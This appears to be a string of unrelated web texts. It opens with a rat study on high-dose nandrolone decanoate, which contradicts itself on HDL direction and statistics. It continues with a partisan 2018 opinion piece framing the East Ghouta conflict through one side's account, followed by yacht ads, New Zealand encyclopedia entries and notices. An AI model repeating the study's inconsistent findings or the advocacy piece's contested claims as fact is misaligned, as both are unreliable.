Conclusions: Present study revealed that chronic high doses of ND administration alter the liver enzymes, lipid profile, and blood parameter in male rats.
Nandrolone Decanoate AST ALT Lipoprotein Profile
Copyright © 2016, Zahedan University of Medical Sciences. This is an open-access article distributed under the terms of the Creative Commons Attribution-NonCommercial 4.0 International License (http://creativecommons.org/licenses/by-nc/4.0/) which permits copy and redistribute the material just in noncommercial usages, provided the original work is properly cited.
Taken in high doses by athletes by the purpose of enhancing muscular strength in athletic performance [1], ND is a synthetic androgen. Gold et al. reported that N D administration in patients suffering from HIV infection improved body weight and lean body mass [2]. Saitoh et al. revealed that injection of ND into young and old mice clearly induced an increase in erythroid colony-forming units (CFU-E); erythroid burst-forming units (BFU-E); and granulocytic-macrophage committed progenitor cells (CFU-GM) in bone marrow in both groups [3]. Moreover, low-dose administration of a considerable number of androgens alters hemoglobin concentrations, while producing potent hypertrophy actions in skeletal muscle [4]. The investigation showed that the use of anabolic-androgenic steroids (AAS) could also be a risk factor to toxicant-associated with fatty liver disease [5]. Combination therapy of Erythropoietin, ND and low-dose of methylprednisolone can be effective as an alternative treatment for Red Blood Cells (RBC) transfusion-dependent to the refractory anemia [6]. Solomon et al. reported that ND therapy reason direct increases in RBC mass [7] among patients suffering from chronic renal failure and were hemodialysis. The anabolic steroid ND is able to alter the muscle restore process in rats [8]. The studies showed that ND administration leads to rise in serum levels of the aspartate aminotransferase (AST), alanine aminotransferase (ALT), and alkaline phosphatase (ALP) compared to the control group [9]. ND causes considerably enhanced markers such as hematocrit in hemodialysis patients [10]. On the other hands ND expresses an anabolic effect on lean body mass (LBM) without altering the renal function [11]. The biochemical studies indicated that ND administration cause increase in serum levels of the AST, ALT, and ALP [12]. The studies revealed that the use of anabolic-androgenic steroids (AAS) could also be a risk factor to toxicant-associated fatty liver disease development [5]. The utilization of ND would agree to us a satisfactory management of anemia in addition to an improved nutritional stipulation in old male patients on dialysis [13].
Since ND is a doping agent and used by athletes, this survey was carried out to evaluate the chronic of high doses of ND on Blood cell, lipid profile, and Liver enzymes in male rats.
The present study was performed on 20 mature male Wistar-Albino rats, weighing 180 ± 30 g; ages were 5 - 7 months separately housed in cages (one rat per cage). Animals had free access to water and food. Rats were maintained in a room at 24 ± 2°C with a fixed 12 hours artificial light period (Timer Model: SUL180a, AC220V. China, 6 Am to 6 Pm). Rats were divided in control(C), placebo (P) and test (T) groups (n = 10) as following: Group T received15 mg/kg iM of ND on a daily basis for eight weeks. Group P did the same volume of sterile Peanut oil (oil vehicle) during the trial period but group C did not receive any agents in experimental period [14]. All groups received standard rodent diet and tap water during handling period. ND was purchased from Caspian pharmaceutics cooperation and was placed in suitable temperature. All injections were performed between 8- 11 o’clock a.m. At the end of experimentation, rats were fasted for 14 - 16 hours, and then all were sacrificed by cervical decapitation under high dose of diethyl ether anesthesia. Blood samples were collected from cervical vessels immediately. Cell bloods were counted by coulter counted. Serum high density lipoprotein (HDL); total cholesterol (TC) and triglyceride (TG) levels; serum AST; and ALT activity were measured by ordinary methods (Technicon, USA). Low density lipoprotein (LDL) was calculated by Friedwald formula [15]. Data were analyzed by SPSS V.17, using ANOVA and Tukey statistical tests. Results were expressed as mean ± SD. Statistical differences were significantly recognized by P ≤ 0.05. These experiments on animals were carried out in accordance with recommendations from the pronouncement of Helsinki and internationally conventional principles for the use of experimental animals, and they received institutional ethical approval from the committee for Animal Research of Zahedan University of Medical Sciences.
After 8 weeks of handling, there were no significant differences (P > 0.05) in LDL and triglyceride values between control and test group; although, HDL value in group T decreased substantially compared to that of group C (Table 1, P = 0.007). On the other hand, the serum AST and ALT activity,and cholesterol values in animals treated with ND were increased significantly (P = 0.001, P = 0.02,) in comparison with those of group C (Table 1).
Table 1. Chronic, of High Doses of ND on Liver Enzymes and Serum Lipid Profiles in Male Rats (N = 10)
LDL, mg/dL 8.9 ± 3.9 9.1 ± 2.8 11.2 ± 7.1 > 0.05
HDL, mg/dL 40.1 ± 8.2 38.1 ± 7.6 22.7 ± 3.6a < 0.007
Chol, mg/dL 54.1 ± 11.4 55.2 ± 10.7 64.4 ± 6.2a < 0.02
TG, mg/dL 65.2 ± 13.4 63.2 ± 12.7 61.4 ± 12.1 > 0.05
AST, iu/L 169.7 ± 4.24 172.1 ± 6.24 255 ± 32a < 0.001
ALT, iu/L 71.6 ± 8.9 69.2 ± 7.7 84.3 ± 3.87a < 0.02
aP < 0.05.
Based on ANOV and Tukey testes, AST, ALT and cholesterol values in male group T were increased significantly compared to those of other groups but HDL value in group T was significantly decreased compared to that of other groups (P < 0.05). In addition, Blood cell parameter, final weight, food ,and water intake in group T rose sharply compared to those of group C and P (Table 2, P < 0.05). The comparison of other parameters values in all groups did not showed any differences.
Table 2. Chronic, of High Doses of ND on Blood Cells, Food and Water Intake in Male Rats (N = 10)
Hemoglobin, g/dL 13.1 ±1.8 12.8 ±2.1 16.4 ± 3.1a < 0.03
Hematocrit, % 43.2 ± 3.3 42.7 ± 2.9 48.6 ± 4.1a < 0.01
RBC, × 106 6.21 ± 2.17 6.81 ± 1.62 8.68 ± 1.23a < 0.03
WBC, × 103 3.6 ± 0.6 4.2 ± 0.4 5.3 ± 1.23a > 0.01
Platelets, ×103 724 ± 76.6 678 ± 68.4 939.9 ± 147.9a < 0.001
Final weight, g 212.8 ± 12.4 215.2 ± 11.1 236 ± 11.2a < 0.02
Food intake, g 13.2 ± 3.1 12.9 ± 2.8 15.7 ± 2.7a < 0.03
Water intake, mL 40.2 ± 5.6 41.7 ± 4.8 48.6 ± 6.6a < 0.001
Based on ANOV and Tukey testes: Blood parameter, Final weight, Food, and Water intake values in group T were significantly increased compared to those of other groups (P < 0.05).
Anabolic-androgenic steroids (AAS) such as ND are artificial androgen agents used in high doses by athletes to enhance muscular potency and performance. Vieira et al. in a biochemical studies investigated that one time administration of dose-dependent ND leads to increases of serum levels activity of AST, ALT, and ALP in wistar male rats .In addition, the Kupffer cells in portal space and in the liver parenchyma increased significantly compared to control group [12]. Clark et al. studies in 2005 revealed that blood biochemical analysis had shown the symptoms of acute hepatitis [16] for a healthy 40-year-old man using ND. In addition, Stimac et al. reported that bilirubin, AST, ALT and ALP level were higher than normal rang [17] for a 26-year-old male bodybuilder who administered high doses of androgenic/anabolic steroids (500 mg intramuscularly, twice weekly). Pertusi et al. investigated that, in male bodybuilder who uses anabolic steroids, the blood serum biochemistries liver enzymes such as AST, ALT, and creatine kinas (CK) levels showed higher values compared to those of male bodybuilder who did not consume anabolic steroid [18]. In addition , studies revealed that blood chemistry profiles such as AST, ALT are higher than those of controls [19] in case of taking self-directed regimens of anabolic steroids bodybuilders (n = 15). Our findings in the present study indicated that eight - week ND administration causes significantly increased serum AST and ALT activity compared to those of control groups. Likewise, they are confirmed by previous study. In addition, our results revealed that HDL value in group T declined noticeably compared to other groups but cholesterol values in this group were significantly higher than group C and P. Previous study revealed that AAS administration provoked protein synthesis, and fiber type composition in skeletal muscles cell and it causes increases body weight in wistar rats [20]. Gold et al. reported that that N D administration in patients suffering from HIV infection causes improved body weight and lean body mass [2]. Our results in the present study similar to previous study indicated that eight weeks administration of ND causes significantly increased body weight. Frankenfeld et al. reported that administration of supraphysiological doses of ND alters glucose metabolism and lipid profile in wistar rats [21]. Experimental study indicated that ND administration in hemodialysis patients has beneficial effects but alters lipid profile by increasing the serum cholesterol and triglyceride [22]. Our findings showed that HDL value in group T was significantly increased compared to other groups and are in agreement with those of lectures and they showed that supraphysiological ND administration for eight weeks in male rats alters the lipid profile. Ghorbanihaghjo et al. investigated that hemoglobin and hematocrit value in hemodialysis patients improved after ND administration [22]. Urhausen in 2003 showed that Blood parameters (hemoglobin, leucocytes and platelets) in 32 male bodybuilders and power lifters who consumed anabolic steroids were significantly higher than references [23]. In addition, they showed that, in this group, AST and ALT value were over limited [23]. Moreover, our finding revealed that that eight- week high dose of ND administration causes increased blood cell in rats. This finding is completed with Saitoh et al. who reported that injection of ND into young and old mice induced an increase in erythroid colony-forming units, erythroid burst-forming units, and granulocytic-macrophage committed progenitor cells in bone marrow in both groups [3]. Our finding revealed that blood parameters in group T were increased substantially compared to that of C and P groups. This section of finding is similar to previous studies. Our finding in the present study revealed that chronic administration of ND causes increased liver toxicity in male rats by altering the blood parameter, gain of weight, food and water intake in male rats.
This study was financially supported by the deputy research center at Zahedan University of Medical Sciences (project No.: 720). We are grateful to Mahnaz Shahrakipour for her kind cooperation.
Funding/Support: Zahedan University of Medical Sciences.
Clark AS, Mitre MC, Brinck-Johnsen T. Anabolic-androgenic steroid and adrenal steroid effects on hippocampal plasticity. Brain Res. 1995; 679(1) : 64 -71 [PubMed]
Gold J, High HA, Li Y, Michelmore H, Bodsworth NJ, Finlayson R, et al. Safety and efficacy of nandrolone decanoate for treatment of wasting in patients with HIV infection. AIDS. 1996; 10(7) : 745 -52 [PubMed]
Saitoh T, Morimoto K, Kumagai T, Tsuboi I, Aikawa S, Horie T. Comparison of erythropoietic response to androgen in young and old senescence accelerated mice. Mech Ageing Dev. 1999; 109(2) : 125 -39 [PubMed]
Yarrow JF, Conover CF, McCoy SC, Lipinska JA, Santillana CA, Hance JM, et al. 17beta-Hydroxyestra-4,9,11-trien-3-one (trenbolone) exhibits tissue selective anabolic activity: effects on muscle, bone, adiposity, hemoglobin, and prostate. Am J Physiol Endocrinol Metab. 2011; 300(4) -60 [DOI][PubMed]
Schwingel PA, Cotrim HP, Salles BR, Almeida CE, dos Santos CJ, Nachef B, et al. Anabolic-androgenic steroids: a possible new risk factor of toxicant-associated fatty liver disease. Liver Int. 2011; 31(3) : 348 -53 [DOI][PubMed]
Tsiara SN, Chaidos A, Gouva M, Christou L, Panteli K, Kapsali E, et al. Successful treatment of refractory anemia with a combination regimen containing recombinant human erythropoietin, low-dose methylprednisolone and nandrolone. J Exp Clin Cancer Res. 2004; 23(1) : 47 -52 [PubMed]
Solomon LR, Hendler ED. Prospective controlled study of androgen therapy in the anemia of chronic renal disease: effects on iron kinetics. Acta Haematol. 1988; 79(1) : 12 -9 [PubMed]
Piovesan RF, Fernandes KP, Alves AN, Teixeira VP, Silva Junior JA, Martins MD, et al. Effect of nandrolone decanoate on skeletal muscle repair. Int J Sports Med. 2013; 34(1) : 87 -2 [DOI][PubMed]
do Carmo CA, Goncalves AL, Salvadori DM, Maistro EL. Nandrolone androgenic hormone presents genotoxic effects in different cells of mice. J Appl Toxicol. 2012; 32(10) : 810 -4 [DOI][PubMed]
Barton Pai A, Chretien C, Lau AH. The effects of nandrolone decanoate on nutritional parameters in hemodialysis patients. Clin Nephrol. 2002; 58(1) : 38 -46 [PubMed]
Eiam-Ong S, Buranaosot S, Eiam-Ong S, Wathanavaha A, Pansin P. Nutritional effect of nandrolone decanoate in predialysis patients with chronic kidney disease. J Ren Nutr. 2007; 17(3) : 173 -8 [DOI][PubMed]
Vieira RP, Franca RF, Damaceno-Rodrigues NR, Dolhnikoff M, Caldini EG, Carvalho CR, et al. Dose-dependent hepatic response to subchronic administration of nandrolone decanoate. Med Sci Sports Exerc. 2008; 40(5) : 842 -7 [DOI][PubMed]
Gascon A, Belvis JJ, Berisa F, Iglesias E, Estopinan V, Teruel JL. Nandrolone decanoate is a good alternative for the treatment of anemia in elderly male patients on hemodialysis. Geriatr Nephrol Urol. 1999; 9(2) : 67 -72 [PubMed]
Tugyan K, Ozbal S, Cilaker S, Kiray M, Pekcetin C, Ergur BU, et al. Neuroprotective effect of erythropoietin on nandrolone decanoate-induced brain injury in rats. Neurosci Lett. 2013; 533 : 28 -33 [DOI][PubMed]
Friedewald WT, Levy RI, Fredrickson DS. Estimation of the concentration of low-density lipoprotein cholesterol in plasma, without use of the preparative ultracentrifuge. Clin Chem. 1972; 18(6) : 499 -502 [PubMed]
Clark BM, Schofield RS. Dilated cardiomyopathy and acute liver injury associated with combined use of ephedra, gamma-hydroxybutyrate, and anabolic steroids. Pharmacotherapy. 2005; 25(5) : 756 -61 [PubMed]
Stimac D, Milic S, Dintinjana RD, Kovac D, Ristic S. Androgenic/Anabolic steroid-induced toxic hepatitis. J Clin Gastroenterol. 2002; 35(4) : 350 -2 [PubMed]
Pertusi R, Dickerman RD, McConathy WJ. Evaluation of aminotransferase elevations in a bodybuilder using anabolic steroids: hepatitis or rhabdomyolysis? J Am Osteopath Assoc. 2001; 101(7) : 391 -4 [PubMed]
Dickerman RD, Pertusi RM, Zachariah NY, Dufour DR, McConathy WJ. Anabolic steroid-induced hepatotoxicity: is it overstated? Clin J Sport Med. 1999; 9(1) : 34 -9 [PubMed]
Fontana K, Campos GE, Staron RS, da Cruz-Hofling MA. Effects of anabolic steroids and high-intensity aerobic exercise on skeletal muscle of transgenic mice. PLoS One. 2013; 8(11)[DOI][PubMed]
Frankenfeld SP, de Oliveira LP, Ignacio DL, Coelho RG, Mattos MN, Ferreira AC, et al. Nandrolone decanoate inhibits gluconeogenesis and decreases fasting glucose in Wistar male rats. J Endocrinol. 2014; 220(2) : 143 -53 [DOI][PubMed]
Ghorbanihaghjo A, Argani H, Rohbaninoubar M, Rashtchizadeh N. Effect of Nandrolone Decanoate on serum lipoprotein (a) and its isoforms in hemodialysis patients. Lipids Health Dis. 2004; 3 : 16 [DOI][PubMed]
Urhausen A, Torsten A, Wilfried K. Reversibility of the effects on blood cells, lipids, liver function and hormones in former anabolic-androgenic steroid abusers. J Steroid Biochem Mol Biol. 2003; 84(2-3) : 369 -75 [PubMed]
Mohammad Reza Shahraki: [PubMed] [Scholar]
Hamideh Mirshekari: [PubMed] [Scholar]
Ahmad Reza Shahraki: [PubMed] [Scholar]
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EAST GHOUTA: Vanessa Beeley on the Taylor Report – East Aleppo All Over Again
March 6, 2018 By Vanessa Beeley Leave a Comment
Hanano, East Aleppo, December 2016. A woman who had been liberated from terrorist occupation hours previously, gives the victory sign.
The parallels between East Ghouta and East Aleppo are unmistakable. The same media hysteria is being rolled out to protect the NATO-member-state-sanctioned terrorist groups that have been occupying the eastern suburbs of Damascus. Just as in East Aleppo, these western backed, armed groups have ruled civilians living under their occupation with a regime of fear and extremist oppression.
In a chilling interview with RT yesterday, Mother Agnes Mariam de la Croix described conditions in Eastern Ghouta. Mother Agnes has humanitarian teams on the ground in the occupied districts of Damascus, as she did during the terrorist occupation of East Aleppo. Mother Agnes describes the sniping and shelling of civilians trying to escape East Ghouta via the humanitarian corridors established by the Syrian and Russian humanitarian teams. She also talks about the frightening levels of gender based violence that is being carried out against women who are imprisoned in these areas and who are suffering appalling abuse at the hands of their militant captors. Mother Agnes describes young girls who are sexually abused in this way.
A recent report on the incidents of GBV across Syria also highlights the prevalence of these violations in the terrorist controlled areas of Syria.
None of this is mentioned in the daily corporate media one-sided reports that serve only to escalate tensions, close down peace talks and optimise the re-equipping & regrouping of the terrorist groups under attack from the Syrian Arab Army divisions that are forging a channel between the two strongholds in the eastern districts and advancing rapidly towards the final urban confrontation with the increasingly kettled guerilla groups, all of whom are affiliated to or controlled by Al Qaeda.
#Syria/n War Report – March 5, 2018: #TigerForces Liberate Large Area From Militants In East #Ghoutahttps://t.co/9wugC4B9dn via @southfronteng pic.twitter.com/NC5nL4XCXF
— Peto Lucem (@PetoLucem) March 5, 2018
I spoke with friends last night in Damascus right on the East Ghouta frontlines. They told me that everyone had moved their cars to a safer place as the daily shelling had intensified dramatically. Most people are staying indoors as the shelling is now more random than ever and happening day and night. With typical Syrian stubborn resistance, these people have refused to leave their homes, fully trusting that the Syrian Arab Army will bring an end to the threat of death-by-mortar that these people have faced for the last five years. When I was recently visiting homes in this area, every house bore the scars of the rockets and mortars that had landed in their kitchens or living rooms. Most windows had lost their glass which had been replaced by acrylic sheet or transparent plastic tarpaulins.
Even Jeremy Bowen of the BBC finally reported on the terrible toll on civilians in Damascus city, many of whom have been maimed for life by the mortar fire from East Damascus:
Um Firas, in hospital in Damascus, waiting for surgery to reconstruct her jaw. Her flat was hit by a mortar fired from Eastern Ghouta. pic.twitter.com/IfnYDoc9C9
— Jeremy Bowen (@BowenBBC) March 5, 2018
Last night I spoke to the Taylor Report (listen below) about the situation in Eastern Ghouta. I have created a video to accompany the report which includes photographs I had taken during the liberation of East Aleppo in December 2016. Civilians emerging from a five-year hell created for them by the US Coalition terrorist groups and their closely aligned media outlets (including the BBC, Guardian, Channel 4, CNN) who had lionised these murderous groups for the duration of the occupation of East Aleppo. I have also included images taken during 2017 and New Year 2018 that clearly show the repopulation of Aleppo since its liberation and the welcome return to its secular, multi-cultural society. Listen:
“East Ghouta will be liberated like Aleppo
Propaganda can’t stand against truth, as Syrians reject U.S.-backed shock troops
Guest: Vanessa Beeley, Syria solidarity activist, Associate Editor at 21st Century Wire
Vanessa Beeley identifies the extremist groups holing up in East Ghouta. They are known, variously, for putting civilians in cages as human shields against airstrikes, firing guided missiles full of bomblets into Damascus, and targeting schoolchildren just as they are leaving schools.
It’s a replica of what happened in East Aleppo. The same terrorist factions have occupied a city and held civilians as hostages. If Ghouta were a suburb of Toronto, and civilians were being daily massacred and targeted from that suburb, would we tolerate this? Or demand that our government and military forces release the civilians and dislodge the terrorists?
Look at Aleppo: After it “fell” [according to corporate media in the West – VB] to the government, it has been reunited with the country. Everywhere in the city is a hive of activity, as citizens restore their businesses, and put their homes back together. The largest city in Syria is coming back to life, just as Western ‘reporters’ lost interest in the city.
Meanwhile, the crimes that ‘rebels’ committed against Syrians in Aleppo are ignored. Western NGOs describe Al Qaeda terrorists as feminist freedom fighters, but Syrians know better. And they won’t be listening to Western humanitarians ever again. Beeley also dismantles the myths behind the current ‘ceasefire.’ Al Qaeda and affiliates never agreed to the ceasefire.”
On the show I mentioned an excellent report by geopolitical analyst and journalist, Elijah Magnier. Here are the excerpts from the article that I included on the Taylor Report:
“Eastern Ghouta seems to be a turning point and a most strategic fight for both Moscow and Damascus. Many reasons motivated this alliance to control it and take it away from the jihadists and rebels. On the other hand, such determination implies similar willpower in the opposite camp led by the US and its allies to prevent Ghouta from being liberated. This is the struggle between the two camps: one is determined to regain control of Ghouta and head towards the end of the war in Syria, and the other is equally determined to keep the war going.
These are the main reasons:
1. Ghouta was and still is considered one of the main areas offering air protection to Damascus against any air attack, possibly coming from Israel. The Syrian Air Defence system has maintained several anti-air missile bases in Ghouta for decades as a crossfire point around the Syrian capital.
At the beginning of the war, the Syrian Army demounted its air radar defence system in Ghouta just before it fell into the hands of the rebels and jihadists. The army didn’t manage to retrieve all missiles: some were destroyed by the new occupiers and others were used, managing to hunt down a Syrian jet.
As they recover Ghouta, the Syrian Army is preparing to deploy an advanced anti-air system, adding an important additional defensive element for the capital Damascus, against any air or long-range missile attacks or violations of its air space.
2. Eastern Ghouta is the weakest point in the vicinity of the capital Damascus. Actually, jihadists and rebels bomb the capital daily with dozens of rockets and missiles. This would make it impossible for any presidential or parliamentary elections to take place under such a continuous threat against the population. In fact, as long as Damascus is unsafe, any political proposal offered by Moscow to end the Syrian war would be handicapped.
3. Ending the war in Ghouta means putting an end to the presence of al-Qaeda (Jabhat al-Nusra aka Hay’at tahrir al-Sham) and Ahrar al-Sham (a group combining the Salafi Jihadists Takfiri and the Muslim brotherhood doctrines) around Damascus. This means, these jihadists will be forced to flee Ghouta for Idlib once they understand the battle to be lost. That will definitely create a push for an exchange with the inhabitants of the besieged cities of Fua and Kfarya, surrounded by Jihadists in north Idlib for over three years.
A similar exchange took place in December 2016 when jihadists and civilians were offered free passage from Aleppo in exchange for Fua and Kfarya civilians (of which dozens were killed while they were crossing, by a suicide bomber from Jund al-Aqsa, the organization close to the “Islamic State” (ISIS) which works alongside al-Qaeda in northern Syria).
4. Ending the battle of Al-Ghouta will free tens of thousands of Syrian soldiers so these can go directly to the southern city of Daraa and also liberate the border area with Israel. One of the Syrian Army’s main targets is expected to be the stronghold of “Khaled Bin Al Waleed’s Army” in the Yarmouk basin on the borders with Israel. This is composed of factions previously associated with ISIS (implying identical methods of operation and ideology), repetitively praised by the ISIS official media outlet A’maq and Al-Battar.”
To read the full article from Magnier, here is the link: Ghouta is the Most Important Battle for Syria and Russia, What Next?
Independent journalist, Eva Bartlett, has also produced a very comprehensive article on the situation in East Ghouta: UN Feigns Outrage Over Ghouta While Terrorist Rockets Rain Down on Damascus.
Taken from the article:
“As with Aleppo, a humanitarian corridor has been established to enable eastern Ghouta residents to leave the district. However, given that terrorists repeatedly shelled humanitarian corridors in Aleppo (including a corridor road I stood on in November 2016), holding civilians hostage, it is quite likely terrorists in eastern Ghouta will do the same.
Yet, in the end, the combination of humanitarian corridors and Syria’s offer of amnesty and reconciliation enabled the exit of terrorists and return of life in Aleppo. As of August 2017, over half a million displaced Syrians returned home, the vast majority internally-displaced.
In Madaya, al-Waer, Homs, and many other areas of Syria, the same deals as in Aleppo enabled the return of stability and life.
In addition to opening the humanitarian corridors, the Syrian army has dropped leaflets over eastern Ghouta informing civilians of designated safe exits for civilians to leave the district to safety in Damascus.
These are the types of actions the UN should be focused on and supporting, not repeating war propaganda that only confuses and prolongs the fight for peace.”
READ MORE SYRIA NEWS AT: 21st Century Wire Syria Files
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Filed Under: Featured, International News, Middle East, Vanessa Beeley Tagged With: Al Qaeda, Damascus, East Aleppo, East Ghouta, Elijah Magnier, Israel, Syria News, UN
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8 New Yachts to the Charter Market in 2020
There's a certain thrill that comes with being the very first to use something. New things are exclusive and exciting. They are full of possibility. Here is a glimpse of eight new yachts joining our fleet in 2020. Read about them below to start planning your next luxury getaway.
MIA ZOI
This 31m (102ft) superyacht has been jetting holidaymakers across the East Mediterranean for years, but with an impressive refit in 2019 it's now like brand new. There are four stunning cabins with rich wooden interiors offset by cream walls and contemporary bedding. There's room for up to 10 persons to enjoy the gorgeous new designs – from the upper deck lounge to the generous dining space.
EXCELLENCE is a hyper-modern megayacht that was launched in 2019. It's bright white exterior features multiple balconies where you can view the coast of the East or West Mediterranean – sunrise, sunset or any time. Luxury on board inclusions range from an outdoor swimming pool and Jacuzzi to the water-level tender garage for your personal limo tenders to shore. With space for 14 guests, it's an ideal choice for large groups of friends or family
Built in 2002, this superyacht also had a refit in 2019. There are five freshly decorated cabins to choose from, plus a stylish lounge that's perfect for movie nights on board. Accommodating 12 persons; ALMA is the perfect superyacht for your group to explore Greece in comfort and style.
If there were a single word to describe LADY LENA, it has to be opulence. From the marble design features in the bathrooms to the plush velvet furnishing; you'll be in ultimate luxury from the moment you set foot on board. Built in 2020, there are six cabins with the capacity for 12 persons.
Another 2020 addition to our superyacht fleet is GECO; available to cruise the Arabian Gulf, East or West Mediterranean and Indian Ocean & South East Asia regions. Whether summer or winter, you'll be more than comfortable in the futuristic interior designs by NCA S.p.A. With space for 12 persons, now is the perfect time to gather your group and secure this superyacht's maiden voyage.
If there is one thing the Italians know how to do very well; it's designing luxury. In 2020, the Italian superyacht PENELOPE could be yours for a West Mediterranean vacation. Every living space – from the interior cabins and dining space to the deck lounge – is generously sized and fitted out with premium décor. There are five cabins and space for up to 10 persons.
AURUM SKY
AURUM SKY is a 44m (143ft) Croatian superyacht which will be launching in May 2020. It's a classic sailing yacht inspired by traditional Gulet styling, combined with modern tech and luxe features. Activities and watertoys on board include a gym, jetski, paddle boards, canoes and a 6.8m tender for water skiing.
MAD SUMMER
Saving the best for last – as they say – we have MAD SUMMER; a 95m (312ft) Lurssen with 10 cabins and room for 12 persons. Built in 2019, it spends the summer months cruising the East and West Mediterranean before heading to the Caribbean over winter. Interiors are an updated version of nautical designs; playing with red, white, blue and stripes. Ahoy Club are lucky enough to have inspected MAD SUMMER and trust us when we say, she's a stunner.
Choose from thousands of yachts online
Ahoy Club have a fleet of over 3,500 luxury, super- and megayachts to choose from. We offer weekly charters and day charters in some of the world's most exclusive, exciting locations. Visit our Charter page to find your perfect yacht.
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Settled Landscape
Country schooling
Story: Country schooling
Getting an education: 1800s
Wider options: 1900s–1930s
Towards equal opportunities: 1935–1980s
Years of reform: 1989 onwards
Personal experiences of country schools
Pakeho school, King Country
Ann Somerville writes of Pakeho school, near Te Kūiti.
What\'s you story?
Contributed by Ann Somerville
Just before you reach the King Country town of Te Kūiti there’s a bank of signs pointing west. It used to include a small district called Pakeho – these days it is not even
named. But if you take the turn and travel about 15 kilometres on a winding road west you’re there, you’re in Pakeho.
The Pakeho school that I went to opened its doors to six pupils in June 1946. Neither building permits nor resource consents were an issue at that time: farmers with children
to educate simply went and picked up a deserted school from nearby Troopers Road. (The original Pakeho school opened in 1917, and at its peak had a roll of 29 children. It closed in 1928).
My sisters and I rode horses two miles to school each day. The horses grazed in the horse paddock during the day, and after school we lined up on the gate, ready to make a flying leap aboard. Pupils at Pakeho school had garden plots, and the older children spent some of the day teaching the primers. Over the years teachers boarded with my family: one, the late Ian Johnstone, rode to school on an ancient racehorse called Rainbird. There were knowing nods at his townie’s habit of leaning inwards when Rainbird went around a corner.
The end of the Second World War saw a surge in the numbers of settlers in Pakeho. By the early 1950s nine families had been aided onto farms created from three large ones, as part of the government’s far-reaching servicemen’s resettlement programme. ‘Rehab’ families were welcomed into the district with typical country warmth, joining older settlers like the Nicols, Boddies, Cleavers and Lembergs. A new and larger Pakeho school opened on 12 October 1953, reflecting the increasing numbers of children in the flourishing district. There was a huge feeling of community at this time, of enthusiasm for brave new beginnings and faith in hard work.
The road to Pakeho is now sealed. Cars speed over it to lifestyle blocks. The school has long gone, but the memories linger. In 2004 Pakeho school celebrated its 50th jubilee, and a round-up of old-timers and former pupils, aided by photographs, remembered the heyday when the school and nearby hall were the hub of local life.
Riding to school on Great Barrier Island
Manahune School, North Canterbury
Nancy Swarbrick, 'Country schooling - Personal experiences of country schools', Te Ara - the Encyclopedia of New Zealand, http://www.TeAra.govt.nz/en/community-contribution/31507/pakeho-school-king-country (accessed 20 January 2020)
Story by Nancy Swarbrick, published 24 Nov 2008
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Earth, Sea and Sky
Ocean Study and Conservation
Sea floor geology
Story: Sea floor geology
Zealandia: the New Zealand continent
The continental shelf
Continental slopes, canyons and landslides
Abysses
How sediment forms
New Zealand sea-floor sediment
Exploring the sea bed
Continental shelves
Most continents, including Australia, have a relatively narrow rim of submerged continental crust. However, the New Zealand continent is unique: 93% of it is submerged, with huge areas of relatively shallow seas extending north-west as far as tropical New Caledonia, and south-east to the scattered subantarctic islands. Most of the continental area is made of true continental crust, but to the north-east (upper right) it is high-standing oceanic crust that has been raised by tectonic forces.
Source: NIWA – National Institute of Water and Atmospheric Research
The New Zealand continent
Keith Lewis, Scott D. Nodder and Lionel Carter, 'Sea floor geology - Zealandia: the New Zealand continent', Te Ara - the Encyclopedia of New Zealand, http://www.TeAra.govt.nz/en/map/5579/continental-shelves (accessed 20 January 2020)
Story by Keith Lewis, Scott D. Nodder and Lionel Carter, published 12 Jun 2006
Fascinating site. We're
john jenkins (not verified)
Fascinating site. We're looking to move to NZ in the next few years and are doing some background research on where to live and what to rear and grow ehen we get there.
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Home → Intellectual Property → Costa Rica increases publication fees for trademark applications
Costa Rica increases publication fees for trademark applications
As of February 25, 2014, the official Gazette increased publication fees for trademark applications
As frequent filers of trademark applications in Costa Rica know, official fees for trademark registration in the country are divided into two main categories. The first are filing fees, which are payable to the Industrial Property Registry at the time of filing. The second ones are publication fees, payable to the official Gazette after a successful formal and substantive examination of the application by the Trademark Office. Publication fees are often more expensive than registration fees.
As of February 25, 2014 the Administration Board of the Gazette increased in approximately $20 the minimum publication fees for trademark applications. In addition, applications that include a figurative element (such as a design, logo, stylized font or typeface, etc.) or cover an exceedingly long description of goods and services may also pay a publication surcharge.
Recently, the Gazette discontinued physical publication and the document is now only available online at: http://www.gaceta.go.cr/gaceta/
This publication is meant solely for general information and should not be regarded as legal advice. If you would like additional information, please contact:
Luis D. Acuña
tel. 00 (506) 2221-9058
LDAcuna@AcunaLegal.com
On March 18, 2014 / Intellectual Property, Trademark
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See All Contest Entries
Five Alumni Earn Top Honors in Vacation Photo Challenge!
The winner: Kelly Oeltjenbruns, JD ’18, dressing the university's namesake as a law school alum at Mount Rushmore National Memorial in South Dakota
Second place: From left, Jason Kravitz and his wife, Marla Dubin, both AB ’90, with their children, Amanda and Ryan Kravitz, all wearing WashU gear while standing in front of the torii gate at Miyajima, Japan
In the second year of our Going Places With WashU photo contest, alumni submitted vacation shots of themselves sporting WashU gear in locations domestic and international, mountainous and beachy, rural and cosmopolitan. More than 100 of you responded, and we enjoyed sharing your photos with our alumni and friends on the Alumni Association's Facebook, Twitter, and Instagram accounts.
There were so many creative and colorful photos to choose from this year that one winner was not enough. So we also picked a second-place winner and three runners-up. Judging was based on how well each submission reflected WashU sprit and captured the essence of the vacation location—as well as photo quality.
The winner (left), Kelly Oeltjenbruns, JD ’18, says her photo was inspired by her experience playing on the law school's basketball team, which was started by Cortez Whatley, JD ’17. The team made jerseys such as the one pictured and wore them to play annual games against a group from Saint Louis University. It is among her favorite WashU memorabilia.
After graduating, Oeltjenbruns spent a year clerking for a federal judge in Sioux Falls, South Dakota. While planning a drive across the state to see Mount Rushmore, she thought a photo of our university's namesake wearing her jersey would perfectly encapsulate both the energy and distinguished history of WashU Law.
Our second-place winner (left), Jason Kravitz, AB ’90, submitted a photo with his wife, Marla Dubin, AB ’90, and their children, Amanda and Ryan Kravitz, at a sacred Shinto shrine that appears to float in the water.
Thank you to everyone who participated in the contest. We hope you keep sharing your WashU spirit throughout the year.
Michael Farchakh, LLM ’16, showing his law school pride at the Boudhanath Stupa in Kathmandu, Nepal
Deanna Goldberg, BFA ’82, taking a photo of the Kremlin in Moscow
Leah Tooks, BS ’04, fifth from left, submitted this photo of herself and 10 additional alumni, which was taken during their yearly get-together to make draft picks for their fantasy football league. They founded the league in 2005, and since 2014 have drafted in person as a way to keep in touch and travel. Several group members met through the John B. Ervin Scholars Program, and others became friends through the Black Alumni Council and the National Society of Black Engineers.
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Jobless react to Obama's pitch
CNN's Jason Carroll gets reaction to President Obama's news conference from the unemployed.
